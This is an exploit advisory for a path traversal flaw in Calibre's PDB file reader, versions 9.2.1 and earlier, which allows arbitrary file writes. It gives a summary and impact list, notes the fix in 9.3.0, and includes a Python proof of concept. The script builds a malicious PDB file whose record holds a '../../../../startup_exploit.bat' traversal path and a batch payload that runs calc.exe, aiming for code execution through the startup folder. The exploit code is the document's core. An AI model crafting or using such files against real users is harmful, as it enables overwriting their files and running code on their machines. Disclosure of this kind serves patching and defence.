=============================================================================================================================================
| # Title     : Calibre ≤ 9.2.1 PDB File Path Traversal Vulnerability Leading to Arbitrary File Write                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://manual.calibre-ebook.com/fr/tutorials.html                                                                          |
=============================================================================================================================================

[+] Summary    : Calibre is a cross-platform e-book management application used for viewing, converting, editing, and organizing digital books.

Versions 9.2.1 and below are vulnerable to a Path Traversal flaw in the PDB file parser, affecting both the 132-byte and 202-byte header variants of the PDB reader implementation.

The vulnerability allows a specially crafted PDB file to embed directory traversal sequences (such as ../) within internal filename fields. When processed by the application, these filenames are not properly sanitized before being written to disk.

[+] As a result, an attacker can:

Write arbitrary files anywhere the user has write permissions

Use arbitrary file extensions

Control the full file content

Silently overwrite existing files (files are written in wb mode)

[+] Impact :

This issue may lead to:

Arbitrary File Write

Local Code Execution (depending on file placement and execution context)

Denial of Service (DoS) through corruption of critical user files

Overwriting configuration, startup, or application data files

The vulnerability has been addressed and fixed in version 9.3.0.

Users are strongly advised to upgrade to version 9.3.0 or later to mitigate the issue.

[+] POC   :  

import struct
import os

def generate_exploit_pdb(filename="exploit.pdb"):

    payload_code = b'@echo off\r\ncalc.exe\r\n'

    traversal_path = b'../../../../startup_exploit.bat'

    image_record = bytearray()
    image_record += b'\x00' * 4
    image_record += traversal_path.ljust(32, b'\x00')
    image_record += b'\x00' * 26
    image_record += payload_code

    header = bytearray(132)
    struct.pack_into('>H', header, 0, 2)     
    struct.pack_into('>H', header, 12, 2)    
    struct.pack_into('>H', header, 20, 1)    
    
    dummy_text = b'<html><body><h1>Hello World</h1></body></html>'
    
    with open(filename, 'wb') as f:

        f.write(b'Exploit Book'.ljust(32, b'\x00')) 
        f.write(b'\x00' * 46) # Padding to reach the records area
        f.write(header)
        f.write(dummy_text)
        f.write(image_record)

    print(f"[+] Exploit file created successfully: {filename}")
    print(f"[*] Target path upon conversion: {traversal_path.decode()}")

if __name__ == "__main__":
    generate_exploit_pdb()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================